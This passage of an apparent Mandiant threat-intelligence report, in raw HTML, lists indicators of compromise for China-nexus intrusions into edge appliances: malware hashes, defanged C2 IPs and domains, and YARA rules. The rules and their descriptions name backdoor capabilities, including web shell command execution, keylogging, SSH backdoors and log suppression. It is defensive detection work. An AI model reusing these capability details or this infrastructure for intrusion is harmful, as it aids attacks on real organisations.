zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe. </span></p>\n<p><span style=\"vertical-align: baseline;\">Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously </span><span style=\"vertical-align: baseline;\">reported</span><span style=\"vertical-align: baseline;\"> by Mandiant, <a href=\"https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics\">China-nexus actors continue to evolve their stealth to avoid detection by defenders</a>. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.</span></p>\n<h2><span style=\"vertical-align: baseline;\">Indicators of Compromise (IOCs)</span></h2>\n<h3><span style=\"vertical-align: baseline;\">Host-Based Indicators (HBIs)</span></h3>\n<div align=\"left\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\"><table border=\"1px\" cellpadding=\"16px\" style=\"border-collapse: collapse; margin-left: auto; margin-right: auto;\"><colgroup><col/><col/><col/></colgroup>\n<thead>\n<tr>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Filename</strong></p>\n</th>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">MD5</strong></p>\n</th>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Description</strong></p>\n</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">data.dat</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">9d684815bc96508b99e6302e253bc292</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">PHANTOMNET</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">epdevmgr.dll</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">b210a9a9f3587894e5a0f225b3a6519f</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">TONERJAM</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">libdsproxy.so</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">4f79c70cce4207d0ad57a339a9c7f43c</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SPAWNMOLE</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">libdsmeeting.so</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">e7d24813535f74187db31d4114f607a1</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SPAWNSNAIL</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">.liblogblock.so</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">4acfc5df7f24c2354384f7449280d9e0 </span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SPAWNSLOTH</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">.dskey</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">3ef30bc3a7e4f5251d8c6e1d3825612d</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SPAWNSNAIL private key</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">bb3b286f88728060c80ea65993576ef8</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">TERRIBLETEA</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">cfca610934b271c26437c4ce891bad00</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">TERRIBLETEA</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">08a817e0ae51a7b4a44bc6717143f9c2</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">TERRIBLETEA</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">linb64.png</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">e7fdbed34f99c05bb5861910ca4cc994</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">lint64.png</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">c251afe252744116219f885980f2caea</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">linb64.png</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">4f68862d3170abd510acd5c500e43548</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">lint64.png</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">9d0b6276cbc4c8b63c269e1ddc145008</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">logd</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">71b4368ef2d91d49820c5b91f33179cb</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">winb64.png</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">d88bbed726d79124535e8f4d7de5592e</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">logd.spec.cfg</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">846369b3a3d4536008a6e1b92ed09549</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER persistence</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">N/A</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">8e429d919e7585de33ea9d7bb29bc86b</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER downloader</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">fc1a8f73010f401d6e95a42889f99028</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">PHANTOMNET</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">e72efc0753e6386fbca0a500836a566e</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">PHANTOMNET</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">N/A</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">4645f2f6800bc654d5fa812237896b00</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">BRICKSTORM</span></p>\n</td>\n</tr>\n</tbody>\n</table></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<p style=\"text-align: center;\"><span style=\"vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Table 4: Host-based indicators</span></p>\n<h3><span style=\"vertical-align: baseline;\">Network-Based Indicators (NBIs)</span></h3>\n<div align=\"left\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\">\n<div style=\"color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;\"><table border=\"1px\" cellpadding=\"16px\" style=\"border-collapse: collapse; margin-left: auto; margin-right: auto;\"><colgroup><col/><col/><col/></colgroup>\n<thead>\n<tr>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Network Indicator</strong></p>\n</th>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Type</strong></p>\n</th>\n<th scope=\"col\" style=\"vertical-align: top; border: 1px solid #000000; padding: 16px;\">\n<p><strong style=\"vertical-align: baseline;\">Description</strong></p>\n</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">8.218.240[.]85</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">98.142.138[.]21</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">103.13.28[.]40</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">103.27.110[.]83</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">103.73.66[.]37</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">193.149.129[.]191</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">206.188.196[.]199</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">IPv4</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">oast[.]fun</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Domain</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Pre-exploitation validation</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">cpanel.netbar[.]org</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Domain</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">WARPWIRE Variant C2 server</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">pan.xj[.]hk</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Domain</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Post-exploitation activity</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">akapush.us[.]to</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Domain</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">SLIVER C2 server</span></p>\n</td>\n</tr>\n<tr>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><code style=\"vertical-align: baseline;\">opra1.oprawh.workers.dev</code></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">Domain</span></p>\n</td>\n<td style=\"vertical-align: middle; border: 1px solid #000000; padding: 16px;\">\n<p><span style=\"vertical-align: baseline;\">BRICKSTORM C2 server</span></p>\n</td>\n</tr>\n</tbody>\n</table></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<p style=\"text-align: center;\"><span style=\"vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;\">Table 5: Network-based indicators</span></p>\n<h3><span style=\"vertical-align: baseline;\">YARA Rules</span></h3></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_Hunting_Webshell_ROOTROT_1 {\n meta:\n author = \"Mandiant\"\n description = \"This rule detects ROOTROT, a web shell written in \nPerl that is embedded into a legitimate Pulse Secure .ttc file to \nenable arbitrary command execution.\"\n \ md5 = \"c7ffd2c06e9b7e8e0b7ac92a0dbe3294\"\n strings:\n $s1 = \"use MIME::Base64\" ascii\n $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 \n65 36 34 28 22 24 6b 65 79 22 29}\n $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e \n22 3b}\n $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e \n5c 6e 22}\n condition:\n filesize < 4KB\n and all of them\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_Hunting_Backdoor_BRICKSTORM_1 {\n meta:\n author = \"Mandiant\"\n created = \"2024-01-30\"\n md5 = \"4645f2f6800bc654d5fa812237896b00\"\n \ descr = \"Hunting rule looking for BRICKSTORM golang backdoor samples\"\n strings:\n \ $v1 = \"/home/vsphere-ui/vcli\" ascii wide\n $v2 = \"/opt/vmware/sbin\" ascii wide\n $v3 = \"/opt/vmware/sbin/vami-httpd\" ascii wide\n $s1 = \"github.com/gorilla/mux\" ascii wide\n $s2 = \"WRITE_LOG=true\" ascii wide\n $s3 = \"wssoft\" ascii wide\n \n condition:\n uint32(0) == 0x464c457f and filesize < 6MB and 1 of ($v*) and 2 of ($s*)\n}</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>import \"pe\"\nrule M_APT_Backdoor_Win_PHANTOMNET_1\n{\n \ meta:\n author = \"Mandiant\"\n md5 = \"59f4d38a5caafbc94673c6d488bf37e3\"\n\n \ strings:\n $phantomnet = /\\\\PhantomNet-\\w{1,10}\\.pdb/ ascii nocase\n \ condition:\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) \nand all of them\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Backdoor_SLIVER_1\n{\n meta:\n Author = “Mandiant”\n description = \"Detects Windows, MacOS and ELF variants \nof the Sliver implant framework\"\n md5 = \"5ecd0c38501dfb02b682cec0a2d93aa9\"\n\n \ strings:\n $s1 = \".InvokeSpawnDllReq\"\n $s2 = \".(*InvokeSpawnDllReq).Reset\"\n \ $s3 = \".(*InvokeSpawnDllReq).ProtoMessage\"\n $s4 = \".(*InvokeSpawnDllReq).ProtoReflect\"\n \ $s5 = \".(*InvokeSpawnDllReq).Descriptor\"\n $s6 = \".(*InvokeSpawnDllReq).GetData\"\n \ $s7 = \".(*InvokeSpawnDllReq).GetProcessName\"\n $s8 = \".(*InvokeSpawnDllReq).GetArgs\"\n \ $s10 = \".(*InvokeSpawnDllReq).GetKill\"\n $s11 = \".(*InvokeSpawnDllReq).GetPPid\"\n \ $s12 = \".(*InvokeSpawnDllReq).GetProcessArgs\"\n $s13 = \".(*InvokeSpawnDllReq).GetRequest\"\n \ $s14 = \".(*InvokeSpawnDllReq).String\"\n $s15 = \".(*InvokeSpawnDllReq).GetEntryPoint\"\n\n \ condition:\n ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) \nor uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) \n== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) \nand 5 of ($s*)\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Backdoor_TERRIBLETEA_1 {\n meta:\n author = \"Mandiant\"\n description = \"This rule is designed to detect on events related \nto terribletea. TERRIBLETEA is a backdoor written in Go that communicates \nover HTTP. Its many capabilities include shell command execution, \ncapturing screens, keystroke logging, port scanning, enumerating files, \nstarting a SOCKS5 proxy and new SSH session, downloading files, and \nexecuting SQL queries.\"\n md5 = \"bb3b286f88728060c80ea65993576ef8\"\n \n strings:\n \ $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E \n[1-12] 80 7B ?? 64}\n $code_get_task = { 48 8D [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 \n8D [5] 41 B8 03 00 00 00 E8}\n $func1 = \"SendRequest\" fullword\n $func2 =\"UploadResult\"\n $func3 =\"Online\"\n $func4 =\"GetCommond\"\n \ condition:\n all of ($code*) and any of ($func*) and filesize<20MB \ \n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_Launcher_TONERJAM_1\n{\n meta:\n author = \"Mandiant\"\n description = \"This rule detects TONERJAM, a launcher that \ndecrypts and executes a shellcode payload stored as an encrypted \nlocal file and decrypts it using an AES key derived from a SHA hash \nof the final 16 bytes of the encrypted payload.\"\n\n strings:\n \ $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}\n $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}\n\n condition:\n \ uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\n (\n \ ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))\n )\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Installer_SPAWNSNAIL_1\n{ \n meta: \n author = \"Mandiant\" \n description = \"Detects SPAWNSNAIL. SPAWNSNAIL is an SSH \nbackdoor targeting Ivanti devices. It has an ability to inject a specified \nbinary to other process, running local SSH backdoor when injected to \ndsmdm process, as well as injecting additional malware to dslogserver\" \n \ md5 = \"e7d24813535f74187db31d4114f607a1\"\n \n strings: \n $priv = \"PRIVATE KEY-----\" ascii fullword\n \n $key1 = \"%d/id_ed25519\" ascii fullword\n $key2 = \"%d/id_ecdsa\" ascii fullword\n $key3 = \"%d/id_rsa\" ascii fullword\n \n $sl1 = \"[selinux] enforce\" ascii fullword\n $sl2 = \"DSVersion::getReleaseStr()\" ascii fullword\n \n \ $ssh1 = \"ssh_set_server_callbacks\" ascii fullword\n $ssh2 = \"ssh_handle_key_exchange\" ascii fullword\n $ssh3 = \"ssh_add_set_channel_callbacks\" ascii fullword\n \ $ssh4 = \"ssh_channel_close\" ascii fullword\n \n condition: \n uint32(0) == 0x464c457f and $priv and any of ($key*) \nand any of ($sl*) and any of ($ssh*)\n} </code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Installer_SPAWNANT_1\n{ \n meta: \n author = \"Mandiant\" \n description = \"Detects SPAWNANT. SPAWNANT is an \nInstaller targeting Ivanti devices. Its purpose is to persistently \ninstall other malware from the SPAWN family (SPAWNSNAIL, \nSPAWNMOLE) as well as drop additional webshells on the box.\" \n \n strings: \n $s1 = \"dspkginstall\" ascii fullword\n $s2 = \"vsnprintf\" ascii fullword\n \ $s3 = \"bom_files\" ascii fullword\n $s4 = \"do-install\" ascii\n \ $s5 = \"ld.so.preload\" ascii\n $s6 = \"LD_PRELOAD\" ascii\n $s7 = \"scanner.py\" ascii\n \n condition: \n uint32(0) == 0x464c457f and 5 of ($s*)\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Tunneler_SPAWNMOLE_1\n{ \n meta: \n \ author = \"Mandiant\" \n description = \"Detects a specific comparisons in SPAWNMOLE \ntunneler, which allow malware to filter put its own traffic . \nSPAWNMOLE is a tunneler written in C and compiled as an ELF32 \nexecutable. The sample is capable of hijacking a process on the \ncompromised system with a specific name and hooking into its \ncommunication capabilities in order to create a proxy server for \ntunneling traffic.\" \n md5 = \"4f79c70cce4207d0ad57a339a9c7f43c\"\n \ \n strings: \n /*\n 3C 16 cmp \ al, 16h\n 74 14 jz short loc_5655C038\n \ 0F B6 45 C1 movzx eax, [ebp+var_3F]\n 3C 03 cmp al, 3\n 74 0C jz \ short loc_5655C038\n 0F B6 45 C5 movzx eax, [ebp+var_3B]\n 3C 01 cmp al, 1\n 0F 85 ED 00 00 00 jnz loc_5655C125\n */\n\n\n $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] \n3C 01 0F 85 }\n\n /*\n \ 81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h\n \ 0F 85 CD 00 00 00 jnz loc_5655C128\n 81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h\n 0F 85 C0 00 00 00 jnz loc_5655C128\n */\n\n $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 \n1B 0F 85}\n \n \n condition: \n uint32(0) == 0x464c457f and all of them\n}\n</code></pre></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code>rule M_APT_Utility_SPAWNSLOTH_1\n{ \n meta: \n author = \"Mandiant\" \n description = \"Detects SPAWNSLOTH. SPAWNSLOTH \nis an Utility targeting Ivanti devices. Its purpose is to work \ntogether with SPAWNSNAIL and block logging via dslogserver \nprocess when SPAWNSNAIL backdoor is active.\" \n md5 = \"4acfc5df7f24c2354384f7449280d9e0\"\n \n strings: \n $dslog = \"dslogserver\" ascii fullword\n\n $hook1 = \"g_do_syslog_servers_exist\" ascii fullword\n $hook2 = \"_ZN5DSLog4File3addEPKci\" ascii fullword\n $hook3 = 